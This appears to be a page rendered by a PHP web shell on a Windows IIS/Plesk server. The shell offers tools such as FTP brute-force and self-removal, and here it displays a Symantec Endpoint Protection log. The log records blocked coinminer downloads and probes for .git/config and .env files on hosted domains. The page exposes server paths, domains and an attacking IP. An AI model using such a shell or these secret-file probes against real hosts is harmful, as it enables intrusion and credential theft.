Software: Microsoft-IIS/10.0. PHP/7.4.33 

uname -a: Windows NT LAKE 10.0 build 20348 (Windows Server 2016) AMD64 

IWPD_801(traduongco) 

Safe-mode: OFF (not secure)

C:\ProgramData\Symantec\Symantec Endpoint Protection\14.3.11216.9000.105\Data\Logs\   drwxrwxrwx
Free 7.27 GB of 99.4 GB (7.32%)
Detected drives: [ a ] [ c ] [ d ] [ e ]
                            Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    

Viewing file:     seclog.log (512 KB)      -rw-rw-rw-

00000001	00080000	000001c8	000001e8	00000108	0000000000081347	0000000e
00000db9	01dc945fbfa517a3	000000ce	00000007	164a8367	164a8367	00000002	00000001	00000001	01dc945f993f11dd	01dc945f9943d64f	00000002	00000a94	[SID: 31908] Web Attack: JSCoinminer Download 108 attack blocked. Traffic has been blocked for this application: C:\PROGRAM FILES (X86)\PLESK\ADDITIONAL\PLESKPHP56\PHP-CGI.EXE		C:\PROGRAM FILES (X86)\PLESK\ADDITIONAL\PLESKPHP56\PHP-CGI.EXE	eyJhY3RvciI6eyJjbWRfbGluZSI6IlwiQzpcXFByb2dyYW0gRmlsZXMgKHg4NilcXFBsZXNrXFxBZGRpdGlvbmFsXFxQbGVza1BIUDU2XFxwaHAtY2dpLmV4ZVwiIiwiZmlsZSI6eyJjb21wYW55X25hbWUiOiJUaGUgUEhQIEdyb3VwIiwiY3JlYXRlZCI6MTU0NzA1MTY3MjAwMCwiZm9sZGVyIjoiYzpcXHByb2dyYW0gZmlsZXMgKHg4NilcXHBsZXNrXFxhZGRpdGlvbmFsXFxwbGVza3BocDU2XFwiLCJtZDUiOiI4MkM1NjQ1NjdDNkI5MTUxNTE0ODBFQjUxMTU4MDhCRSIsIm5hbWUiOiJwaHAtY2dpLmV4ZSIsInBhdGgiOiJjOlxccHJvZ3JhbSBmaWxlcyAoeDg2KVxccGxlc2tcXGFkZGl0aW9uYWxcXHBsZXNrcGhwNTZcXHBocC1jZ2kuZXhlIiwicHJvZHVjdF9uYW1lIjoiUEhQIiwic2hhMSI6IjVBNzg1MkQyMjk0OTMyMDMzRTc2Q0Q2MDY1M0YyQTM1MkMwNjFGRkMiLCJzaGEyIjoiODNEMjRDOURCNDdBOTUzNjUyQUIyQzg0Njg4Q0M4NTdBMDNCRjBBM0Q1MjU4Nzc1MEJFNTJDMzZDRUNENzc3OSIsInNpZ25hdHVyZV92YWx1ZSI6MTA5OTUxMTYyNzc3Niwic2lnbmF0dXJlX3ZhbHVlX2lkcyI6WzBdLCJ2ZXJzaW9uIjoiNS42LjQwIiwieGF0dHJpYnV0ZXMiOnsicG9ydGFsIjpmYWxzZX19LCJwaWQiOjEyOTAwLCJzZXNzaW9uX2lkIjowLCJzdGFydF90aW1lIjoxNzcwMDQ3OTQyODcyLCJ1aWQiOiJDM0QxRkIyRC0wMDRGLUYxRjEtQjlFQy1FMEQwRjc4NDBDQkIifSwiY29ubmVjdGlvbiI6eyJjb25uZWN0aW9uX2RpcmVjdGlvbl9pZCI6Mn0sImRldGVjdGlvbl91aWQiOiI5OTNFQTBCMy05NDVGLTExRjEtOTY3MS04MDZFNkY2RTY5NjMiLCJwYXJlbnQiOnsiY21kX2xpbmUiOiJDOlxcV0lORE9XU1xcU3lzV09XNjRcXGluZXRzcnZcXHczd3AuZXhlIC1hcCBcInN1amNvbS5jb20oZG9tYWluKSgyLjApKHBvb2wpXCIgLXYgXCJ2Mi4wXCIgLWwgXCJ3ZWJlbmdpbmU0LmRsbFwiIC1hIFxcXFwuXFxwaXBlXFxpaXNpcG0wNjYxN2MxNy0wNWFiLTQ1ODEtYTgxMC00YmY2ZTliOWIzMmIgLWggXCJDOlxcaW5ldHB1YlxcdGVtcFxcYXBwcG9vbHNcXHN1amNvbS5jb20oZG9tYWluKSgyLjApKHBvb2wpXFxzdWpjb20uY29tKGRvbWFpbikoMi4wKShwb29sKS5jb25maWdcIiAtdyBcIlwiIC1tIDAgLXQgNSAtdGEgMCIsImZpbGUiOnsiY29tcGFueV9uYW1lIjoiTWljcm9zb2Z0IENvcnBvcmF0aW9uIiwiY3JlYXRlZCI6MTYyMDQ2MTc2MjE5MSwiZm9sZGVyIjoiYzpcXHdpbmRvd3NcXHN5c3dvdzY0XFxpbmV0c3J2XFwiLCJtZDUiOiIzRDI3MjU3NEYzNzhCQTA2RkQyQjg1Q0I3NzlDMDNBQSIsIm5hbWUiOiJ3M3dwLmV4ZSIsInBhdGgiOiJjOlxcd2luZG93c1xcc3lzd293NjRcXGluZXRzcnZcXHczd3AuZXhlIiwicHJvZHVjdF9uYW1lIjoiSW50ZXJuZXQgSW5mb3JtYXRpb24gU2VydmljZXMiLCJzaGExIjoiMTkxN0Y2OUVEMjYwRTUxMzEwMTVGOUE1RDcyMTFBRjcwRjBFQTUzQiIsInNoYTIiOiJBNEUxQTVCMTQ4OUIzMTYwNjRGMDgzQzRDRDdCRkM4M0I3MEVFNDY4NEE0RDk3RDFBRDFDNEU2RDY0ODE2MUEzIiwic2lnbmF0dXJlX2NvbXBhbnlfbmFtZSI6Ik1pY3Jvc29mdCBDb3Jwb3JhdGlvbiIsInNpZ25hdHVyZV9jcmVhdGVkX2RhdGUiOjE3NDgzNTg1NDAwMDAsInNpZ25hdHVyZV9pc3N1ZXIiOiJNaWNyb3NvZnQgV2luZG93cyBQcm9kdWN0aW9uIFBDQSAyMDExIiwic2lnbmF0dXJlX3ZhbHVlIjoxMDk5NTIwNzc0MTk5LCJzaWduYXR1cmVfdmFsdWVfaWRzIjpbMSwyLDMsNSw2LDEzLDE2LDE3LDE4LDIwXSwidmVyc2lvbiI6IjEwLjAuMjAzNDguMSIsInhhdHRyaWJ1dGVzIjp7InBvcnRhbCI6ZmFsc2V9fSwicGlkIjozMDcxNiwic2Vzc2lvbl9pZCI6MCwic3RhcnRfdGltZSI6MTc3MDA0MzQzMTQxOSwidWlkIjoiMDQ2ODJBQjUtMDAyNy1GMUYxLUI5RUMtRTBEMEY3ODQwQ0JCIn0sInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzE5MDgsIm5hbWUiOiJXZWIgQXR0YWNrOiBKU0NvaW5taW5lciBEb3dubG9hZCAxMDgiLCJyaXNrX2lkIjowLCJ0eXBlX2lkIjo2fX0=			Default	none		00007ca4	00010001	00000002	00000002	00000050	0000eef1	00000000000000000000000000000000	00000000000000000000000000000000	Web Attack: JSCoinminer Download 108	http://geomax.vn/wp-cron.php?doing_wp_cron=1770049120.6638159751892089843750			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		83D24C9DB47A953652AB2C84688CC857A03BF0A3D52587750BE52C36CECD7779	00000000	00000000	
000003a6	01dc9460c2e91c92	000000ce	0000000f	164a8367	6d6eb2c3	00000002	00000002	00000001	01dc94609c787cf3	01dc94609c787cf3	00000001	0000011c	[SID: 30711] Audit: .git Directory Information Leak attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IjlDNzdBODgzLTk0NjAtMTFGMS1BNTJBLTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzA3MTEsIm5hbWUiOiJBdWRpdDogLmdpdCBEaXJlY3RvcnkgSW5mb3JtYXRpb24gTGVhayIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		000077f7	00010000	00000002	00000002	0000f660	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: .git Directory Information Leak	http://moitruongquangminh.com/.git/config			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003a1	01dc9460da2b6231	000000ce	0000000f	164a8367	f40a942d	00000002	00000002	00000001	01dc9460b506fb38	01dc9460b506fb38	00000001	0000011c	[SID: 30711] Audit: .git Directory Information Leak attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkI1MDYzNkM3LTk0NjAtMTFGMS05Rjc3LTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzA3MTEsIm5hbWUiOiJBdWRpdDogLmdpdCBEaXJlY3RvcnkgSW5mb3JtYXRpb24gTGVhayIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		000077f7	00010000	00000002	00000002	00006aac	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: .git Directory Information Leak	http://xaylapangiang.com/.git/config			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
0000039a	01dc9460e422721f	000000ce	0000000f	164a8367	c76eb2c3	00000002	00000002	00000001	01dc9460bd2a07dc	01dc9460bd2a07dc	00000001	0000011c	[SID: 30711] Audit: .git Directory Information Leak attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkJEMjZENzI2LTk0NjAtMTFGMS05MEUwLTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzA3MTEsIm5hbWUiOiJBdWRpdDogLmdpdCBEaXJlY3RvcnkgSW5mb3JtYXRpb24gTGVhayIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		000077f7	00010000	00000002	00000002	0000ed54	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: .git Directory Information Leak	http://sujcom.com/.git/config			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
00000db9	01dc946101e36c15	000000ce	00000007	164a8367	164a8367	00000002	00000001	00000001	01dc9460ddee9d3c	01dc9460ddee9d3c	00000001	00000a94	[SID: 31908] Web Attack: JSCoinminer Download 108 attack blocked. Traffic has been blocked for this application: C:\PROGRAM FILES (X86)\PLESK\ADDITIONAL\PLESKPHP56\PHP-CGI.EXE		C:\PROGRAM FILES (X86)\PLESK\ADDITIONAL\PLESKPHP56\PHP-CGI.EXE	eyJhY3RvciI6eyJjbWRfbGluZSI6IlwiQzpcXFByb2dyYW0gRmlsZXMgKHg4NilcXFBsZXNrXFxBZGRpdGlvbmFsXFxQbGVza1BIUDU2XFxwaHAtY2dpLmV4ZVwiIiwiZmlsZSI6eyJjb21wYW55X25hbWUiOiJUaGUgUEhQIEdyb3VwIiwiY3JlYXRlZCI6MTU0NzA1MTY3MjAwMCwiZm9sZGVyIjoiYzpcXHByb2dyYW0gZmlsZXMgKHg4NilcXHBsZXNrXFxhZGRpdGlvbmFsXFxwbGVza3BocDU2XFwiLCJtZDUiOiI4MkM1NjQ1NjdDNkI5MTUxNTE0ODBFQjUxMTU4MDhCRSIsIm5hbWUiOiJwaHAtY2dpLmV4ZSIsInBhdGgiOiJjOlxccHJvZ3JhbSBmaWxlcyAoeDg2KVxccGxlc2tcXGFkZGl0aW9uYWxcXHBsZXNrcGhwNTZcXHBocC1jZ2kuZXhlIiwicHJvZHVjdF9uYW1lIjoiUEhQIiwic2hhMSI6IjVBNzg1MkQyMjk0OTMyMDMzRTc2Q0Q2MDY1M0YyQTM1MkMwNjFGRkMiLCJzaGEyIjoiODNEMjRDOURCNDdBOTUzNjUyQUIyQzg0Njg4Q0M4NTdBMDNCRjBBM0Q1MjU4Nzc1MEJFNTJDMzZDRUNENzc3OSIsInNpZ25hdHVyZV92YWx1ZSI6MTA5OTUxMTYyNzc3Niwic2lnbmF0dXJlX3ZhbHVlX2lkcyI6WzBdLCJ2ZXJzaW9uIjoiNS42LjQwIiwieGF0dHJpYnV0ZXMiOnsicG9ydGFsIjpmYWxzZX19LCJwaWQiOjg1MDQsInNlc3Npb25faWQiOjAsInN0YXJ0X3RpbWUiOjE3NzAwNDk2MzcxNDksInVpZCI6IjA3QkE2MzJCLTAwNTQtRjFGMS1COUVDLUUwRDBGNzg0MENCQiJ9LCJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoyfSwiZGV0ZWN0aW9uX3VpZCI6IkRERTlBNzVDLTk0NjAtMTFGMS04RTlELTgwNkU2RjZFNjk2MyIsInBhcmVudCI6eyJjbWRfbGluZSI6IkM6XFxXSU5ET1dTXFxTeXNXT1c2NFxcaW5ldHNydlxcdzN3cC5leGUgLWFwIFwic3VqY29tLmNvbShkb21haW4pKDIuMCkocG9vbClcIiAtdiBcInYyLjBcIiAtbCBcIndlYmVuZ2luZTQuZGxsXCIgLWEgXFxcXC5cXHBpcGVcXGlpc2lwbTA2NjE3YzE3LTA1YWItNDU4MS1hODEwLTRiZjZlOWI5YjMyYiAtaCBcIkM6XFxpbmV0cHViXFx0ZW1wXFxhcHBwb29sc1xcc3VqY29tLmNvbShkb21haW4pKDIuMCkocG9vbClcXHN1amNvbS5jb20oZG9tYWluKSgyLjApKHBvb2wpLmNvbmZpZ1wiIC13IFwiXCIgLW0gMCAtdCA1IC10YSAwIiwiZmlsZSI6eyJjb21wYW55X25hbWUiOiJNaWNyb3NvZnQgQ29ycG9yYXRpb24iLCJjcmVhdGVkIjoxNjIwNDYxNzYyMTkxLCJmb2xkZXIiOiJjOlxcd2luZG93c1xcc3lzd293NjRcXGluZXRzcnZcXCIsIm1kNSI6IjNEMjcyNTc0RjM3OEJBMDZGRDJCODVDQjc3OUMwM0FBIiwibmFtZSI6Inczd3AuZXhlIiwicGF0aCI6ImM6XFx3aW5kb3dzXFxzeXN3b3c2NFxcaW5ldHNydlxcdzN3cC5leGUiLCJwcm9kdWN0X25hbWUiOiJJbnRlcm5ldCBJbmZvcm1hdGlvbiBTZXJ2aWNlcyIsInNoYTEiOiIxOTE3RjY5RUQyNjBFNTEzMTAxNUY5QTVENzIxMUFGNzBGMEVBNTNCIiwic2hhMiI6IkE0RTFBNUIxNDg5QjMxNjA2NEYwODNDNENEN0JGQzgzQjcwRUU0Njg0QTREOTdEMUFEMUM0RTZENjQ4MTYxQTMiLCJzaWduYXR1cmVfY29tcGFueV9uYW1lIjoiTWljcm9zb2Z0IENvcnBvcmF0aW9uIiwic2lnbmF0dXJlX2NyZWF0ZWRfZGF0ZSI6MTc0ODM1ODU0MDAwMCwic2lnbmF0dXJlX2lzc3VlciI6Ik1pY3Jvc29mdCBXaW5kb3dzIFByb2R1Y3Rpb24gUENBIDIwMTEiLCJzaWduYXR1cmVfdmFsdWUiOjEwOTk1MjA3NzQxOTksInNpZ25hdHVyZV92YWx1ZV9pZHMiOlsxLDIsMyw1LDYsMTMsMTYsMTcsMTgsMjBdLCJ2ZXJzaW9uIjoiMTAuMC4yMDM0OC4xIiwieGF0dHJpYnV0ZXMiOnsicG9ydGFsIjpmYWxzZX19LCJwaWQiOjMwNzE2LCJzZXNzaW9uX2lkIjowLCJzdGFydF90aW1lIjoxNzcwMDQzNDMxNDE5LCJ1aWQiOiIwNDY4MkFCNS0wMDI3LUYxRjEtQjlFQy1FMEQwRjc4NDBDQkIifSwicmVtZWRpYXRlZCI6dHJ1ZSwidGhyZWF0Ijp7ImlkIjozMTkwOCwibmFtZSI6IldlYiBBdHRhY2s6IEpTQ29pbm1pbmVyIERvd25sb2FkIDEwOCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007ca4	00010001	00000002	00000002	00000050	0000fcc4	00000000000000000000000000000000	00000000000000000000000000000000	Web Attack: JSCoinminer Download 108	http://geomax.vn/wp-cron.php?doing_wp_cron=1770049655.2929630279541015625000			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		83D24C9DB47A953652AB2C84688CC857A03BF0A3D52587750BE52C36CECD7779	00000000	00000000	
00000216	01dc94611281944d	000000d3	0000000f	164a8367	164a8367	00000001	00000000	00000000	01dc9460ebeccf23	01dc9460ebeccf23	00000001	00000000	Active Response that started at 2/2/2026 11:18:09 PM is disengaged. The traffic from IP address 103.131.74.22 was blocked for 600 second(s).
						Default	none		00000000	00000000	00000002	00000002	00000000	00000000	00000000000000000000000000000000	00000000000000000000000000000000					14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000000			00000000	00000000	
000003a3	01dc94635f28235b	000000ce	0000000f	164a8367	f192ecc0	00000002	00000002	00000001	01dc94633ab38485	01dc94633ab38485	00000001	0000011c	[SID: 30711] Audit: .git Directory Information Leak attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IjNBQjJCRkVBLTk0NjMtMTFGMS04QzQ3LTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzA3MTEsIm5hbWUiOiJBdWRpdDogLmdpdCBEaXJlY3RvcnkgSW5mb3JtYXRpb24gTGVhayIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		000077f7	00010000	00000002	00000002	00008a0a	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: .git Directory Information Leak	http://www.matkinh1001.com/.git/config			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003b2	01dc94671fbe497a	000000ce	0000000f	164a8367	400a942d	00000002	00000002	00000001	01dc9466f97ae7be	01dc9466f97ae7be	00000001	0000011c	[SID: 30711] Audit: .git Directory Information Leak attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkY5Nzg2MTY4LTk0NjYtMTFGMS1CRTY4LTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzA3MTEsIm5hbWUiOiJBdWRpdDogLmdpdCBEaXJlY3RvcnkgSW5mb3JtYXRpb24gTGVhayIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		000077f7	00010000	00000002	00000002	0000d0ba	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: .git Directory Information Leak	http://hostmaster.toyota-tanphu.com/admin/.git/config			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
00000213	01dc9467cca4e002	000000cf	00000007	164a8367	164a8367	00000001	00000000	00000001	01dc9467cba0fe39	01dc94693141ba39	00000001	00000000	The client will block traffic from IP address 103.131.74.22 for the next 600 seconds (from 2/3/2026 12:17:23 AM to 2/3/2026 12:27:23 AM).
						Default	none		00000000	00000000	00000002	00000002	00000000	00000000	00000000000000000000000000000000	00000000000000000000000000000000					14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000000			00000000	00000000	
00000db9	01dc9467f1328a4b	000000ce	00000007	164a8367	164a8367	00000002	00000001	00000001	01dc9467cb977607	01dc9467cb977607	00000001	00000a94	[SID: 31908] Web Attack: JSCoinminer Download 108 attack blocked. Traffic has been blocked for this application: C:\PROGRAM FILES (X86)\PLESK\ADDITIONAL\PLESKPHP56\PHP-CGI.EXE		C:\PROGRAM FILES (X86)\PLESK\ADDITIONAL\PLESKPHP56\PHP-CGI.EXE	eyJhY3RvciI6eyJjbWRfbGluZSI6IlwiQzpcXFByb2dyYW0gRmlsZXMgKHg4NilcXFBsZXNrXFxBZGRpdGlvbmFsXFxQbGVza1BIUDU2XFxwaHAtY2dpLmV4ZVwiIiwiZmlsZSI6eyJjb21wYW55X25hbWUiOiJUaGUgUEhQIEdyb3VwIiwiY3JlYXRlZCI6MTU0NzA1MTY3MjAwMCwiZm9sZGVyIjoiYzpcXHByb2dyYW0gZmlsZXMgKHg4NilcXHBsZXNrXFxhZGRpdGlvbmFsXFxwbGVza3BocDU2XFwiLCJtZDUiOiI4MkM1NjQ1NjdDNkI5MTUxNTE0ODBFQjUxMTU4MDhCRSIsIm5hbWUiOiJwaHAtY2dpLmV4ZSIsInBhdGgiOiJjOlxccHJvZ3JhbSBmaWxlcyAoeDg2KVxccGxlc2tcXGFkZGl0aW9uYWxcXHBsZXNrcGhwNTZcXHBocC1jZ2kuZXhlIiwicHJvZHVjdF9uYW1lIjoiUEhQIiwic2hhMSI6IjVBNzg1MkQyMjk0OTMyMDMzRTc2Q0Q2MDY1M0YyQTM1MkMwNjFGRkMiLCJzaGEyIjoiODNEMjRDOURCNDdBOTUzNjUyQUIyQzg0Njg4Q0M4NTdBMDNCRjBBM0Q1MjU4Nzc1MEJFNTJDMzZDRUNENzc3OSIsInNpZ25hdHVyZV92YWx1ZSI6MTA5OTUxMTYyNzc3Niwic2lnbmF0dXJlX3ZhbHVlX2lkcyI6WzBdLCJ2ZXJzaW9uIjoiNS42LjQwIiwieGF0dHJpYnV0ZXMiOnsicG9ydGFsIjpmYWxzZX19LCJwaWQiOjQxNTA0LCJzZXNzaW9uX2lkIjowLCJzdGFydF90aW1lIjoxNzcwMDUyMjk2MDQwLCJ1aWQiOiIxRUM5RDIxNy0wMDVBLUYxRjEtQjlFQy1FMEQwRjc4NDBDQkIifSwiY29ubmVjdGlvbiI6eyJjb25uZWN0aW9uX2RpcmVjdGlvbl9pZCI6Mn0sImRldGVjdGlvbl91aWQiOiJDQjk3MDU4MC05NDY3LTExRjEtQTY4OS04MDZFNkY2RTY5NjMiLCJwYXJlbnQiOnsiY21kX2xpbmUiOiJDOlxcV0lORE9XU1xcU3lzV09XNjRcXGluZXRzcnZcXHczd3AuZXhlIC1hcCBcInN1amNvbS5jb20oZG9tYWluKSgyLjApKHBvb2wpXCIgLXYgXCJ2Mi4wXCIgLWwgXCJ3ZWJlbmdpbmU0LmRsbFwiIC1hIFxcXFwuXFxwaXBlXFxpaXNpcG0wNjYxN2MxNy0wNWFiLTQ1ODEtYTgxMC00YmY2ZTliOWIzMmIgLWggXCJDOlxcaW5ldHB1YlxcdGVtcFxcYXBwcG9vbHNcXHN1amNvbS5jb20oZG9tYWluKSgyLjApKHBvb2wpXFxzdWpjb20uY29tKGRvbWFpbikoMi4wKShwb29sKS5jb25maWdcIiAtdyBcIlwiIC1tIDAgLXQgNSAtdGEgMCIsImZpbGUiOnsiY29tcGFueV9uYW1lIjoiTWljcm9zb2Z0IENvcnBvcmF0aW9uIiwiY3JlYXRlZCI6MTYyMDQ2MTc2MjE5MSwiZm9sZGVyIjoiYzpcXHdpbmRvd3NcXHN5c3dvdzY0XFxpbmV0c3J2XFwiLCJtZDUiOiIzRDI3MjU3NEYzNzhCQTA2RkQyQjg1Q0I3NzlDMDNBQSIsIm5hbWUiOiJ3M3dwLmV4ZSIsInBhdGgiOiJjOlxcd2luZG93c1xcc3lzd293NjRcXGluZXRzcnZcXHczd3AuZXhlIiwicHJvZHVjdF9uYW1lIjoiSW50ZXJuZXQgSW5mb3JtYXRpb24gU2VydmljZXMiLCJzaGExIjoiMTkxN0Y2OUVEMjYwRTUxMzEwMTVGOUE1RDcyMTFBRjcwRjBFQTUzQiIsInNoYTIiOiJBNEUxQTVCMTQ4OUIzMTYwNjRGMDgzQzRDRDdCRkM4M0I3MEVFNDY4NEE0RDk3RDFBRDFDNEU2RDY0ODE2MUEzIiwic2lnbmF0dXJlX2NvbXBhbnlfbmFtZSI6Ik1pY3Jvc29mdCBDb3Jwb3JhdGlvbiIsInNpZ25hdHVyZV9jcmVhdGVkX2RhdGUiOjE3NDgzNTg1NDAwMDAsInNpZ25hdHVyZV9pc3N1ZXIiOiJNaWNyb3NvZnQgV2luZG93cyBQcm9kdWN0aW9uIFBDQSAyMDExIiwic2lnbmF0dXJlX3ZhbHVlIjoxMDk5NTIwNzc0MTk5LCJzaWduYXR1cmVfdmFsdWVfaWRzIjpbMSwyLDMsNSw2LDEzLDE2LDE3LDE4LDIwXSwidmVyc2lvbiI6IjEwLjAuMjAzNDguMSIsInhhdHRyaWJ1dGVzIjp7InBvcnRhbCI6ZmFsc2V9fSwicGlkIjozMDcxNiwic2Vzc2lvbl9pZCI6MCwic3RhcnRfdGltZSI6MTc3MDA0MzQzMTQxOSwidWlkIjoiMDQ2ODJBQjUtMDAyNy1GMUYxLUI5RUMtRTBEMEY3ODQwQ0JCIn0sInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzE5MDgsIm5hbWUiOiJXZWIgQXR0YWNrOiBKU0NvaW5taW5lciBEb3dubG9hZCAxMDgiLCJyaXNrX2lkIjowLCJ0eXBlX2lkIjo2fX0=			Default	none		00007ca4	00010001	00000002	00000002	00000050	0000d9b1	00000000000000000000000000000000	00000000000000000000000000000000	Web Attack: JSCoinminer Download 108	http://geomax.vn/wp-cron.php?doing_wp_cron=1770052638.9000270366668701171875			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		83D24C9DB47A953652AB2C84688CC857A03BF0A3D52587750BE52C36CECD7779	00000000	00000000	
000003b4	01dc946815c4be6e	000000ce	0000000f	164a8367	fd53772d	00000002	00000002	00000001	01dc9467f0fe1665	01dc9467f0fe1665	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkYwRkQ1MjlELTk0NjctMTFGMS05NjM5LTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	0000acac	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://103.131.74.22/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003bb	01dc946815c4be6e	000000ce	0000000f	164a8367	fd53772d	00000002	00000002	00000001	01dc9467f17ed774	01dc9467f17ed774	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkYxMUVBM0M0LTk0NjctMTFGMS05NjQ3LTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	0000afe0	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://103.131.74.22/public/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003b8	01dc946815c4be6e	000000ce	0000000f	164a8367	fd53772d	00000002	00000002	00000001	01dc9467f19dd4ad	01dc9467f19dd4ad	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkYxOUI1RUJFLTk0NjctMTFGMS05NjdCLTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	0000b4da	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://103.131.74.22/app/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
00000216	01dc94695839d511	000000d3	0000000f	164a8367	164a8367	00000001	00000000	00000000	01dc946931637064	01dc946931637064	00000001	00000000	Active Response that started at 2/3/2026 12:17:23 AM is disengaged. The traffic from IP address 103.131.74.22 was blocked for 600 second(s).
						Default	none		00000000	00000000	00000002	00000002	00000000	00000000	00000000000000000000000000000000	00000000000000000000000000000000					14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000000			00000000	00000000	
00000213	01dc94695ee02d84	000000cf	00000007	164a8367	164a8367	00000001	00000000	00000001	01dc94695d1ff168	01dc946ac2c0ad68	00000001	00000000	The client will block traffic from IP address 103.131.74.22 for the next 600 seconds (from 2/3/2026 12:28:36 AM to 2/3/2026 12:38:36 AM).
						Default	none		00000000	00000000	00000002	00000002	00000000	00000000	00000000000000000000000000000000	00000000000000000000000000000000					14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000000			00000000	00000000	
